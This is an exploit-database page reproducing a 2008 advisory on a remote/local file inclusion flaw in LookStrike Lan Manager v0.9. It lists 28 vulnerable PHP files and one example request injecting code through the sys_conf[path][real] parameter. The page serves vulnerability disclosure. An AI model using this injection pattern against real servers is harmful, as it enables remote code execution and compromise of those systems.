header-logo
Suggest Exploit
vendor:
LookStrike Lan Manager v0.9
by:
MhZ91
N/A
CVSS
N/A
RemoteLocal File Inclusion
Not mentioned
CWE
Product Name: LookStrike Lan Manager v0.9
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: Not mentioned
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

LookStrike Lan Manager v0.9 RemoteLocal File Inclusion

LookStrike Lan Manager v0.9 has a remote/local file inclusion vulnerability in multiple files. These files include: modulesclassTable.php, modulesclassdbdb_admins.php, modulesclassdbdb_alert.php, modulesclassdbdb_double.php, modulesclassdbdb_games.php, modulesclassdbdb_matches.php, modulesclassdbdb_match_teams.php, modulesclassdbdb_news.php, modulesclassdbdb_platform.php, modulesclassdbdb_players.php, modulesclassdbdb_server_group.php, modulesclassdbdb_server_ip.php, modulesclassdbdb_teams.php, modulesclassdbdb_team_players.php, modulesclassdbdb_tournaments.php, modulesclassdbdb_tournament_teams.php, modulesclassdbdb_trees.php, modulesclasstournamentMatch.php, modulesclasstournamentMatchTeam.php, modulesclasstournamentRule.php, modulesclasstournamentRuleBuilder.php, modulesclasstournamentRulePool.php, modulesclasstournamentRuleSingle.php, modulesclasstournamentRuleTree.php, modulesclasstournamentTournament.php, modulesclasstournamentTournamentTeam.php, modulesclasstournamentTree.php, and modulesclasstournamentTreeSingle.php. These files can be exploited using the variable "sys_conf[path][real]".

Mitigation:

Not mentioned
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		LookStrike Lan Manager v0.9 Remote\Local File Inclusion              +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: LookStrike Lan Manager v0.9 Remote\Local File Inclusion 
 Download: http://sourceforge.net/project/showfiles.php?group_id=152660
 Bug: Remote\Local File Inclusion
 Info: LookStrike is a tool written in PHP that manages Lan Party to gain a lot of time about the management of your Lan. You can also gather statistics of your players. LookStrike generate graphics and matches for tournaments automatically.
 Visit: http://www.inj3ct-it.org

[*]----------------------------------------------------------

LookStrike Lan Manager v0.9 present a remote\local file inclusion vulnerability in this file.. 

modules\class\Table.php
modules\class\db\db_admins.php
modules\class\db\db_alert.php
modules\class\db\db_double.php
modules\class\db\db_games.php
modules\class\db\db_matches.php
modules\class\db\db_match_teams.php
modules\class\db\db_news.php
modules\class\db\db_platform.php
modules\class\db\db_players.php
modules\class\db\db_server_group.php
modules\class\db\db_server_ip.php
modules\class\db\db_teams.php
modules\class\db\db_team_players.php
modules\class\db\db_tournaments.php
modules\class\db\db_tournament_teams.php
modules\class\db\db_trees.php
modules\class\tournament\Match.php
modules\class\tournament\MatchTeam.php
modules\class\tournament\Rule.php
modules\class\tournament\RuleBuilder.php
modules\class\tournament\RulePool.php
modules\class\tournament\RuleSingle.php
modules\class\tournament\RuleTree.php
modules\class\tournament\Tournament.php
modules\class\tournament\TournamentTeam.php
modules\class\tournament\Tree.php
modules\class\tournament\TreeSingle.php

all are exploitable by the variable "sys_conf[path][real]" for example

http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]


[*]----------------------------------------------------------

# milw0rm.com [2008-02-14]

Navigation

Suggest Exploit

Services By CQR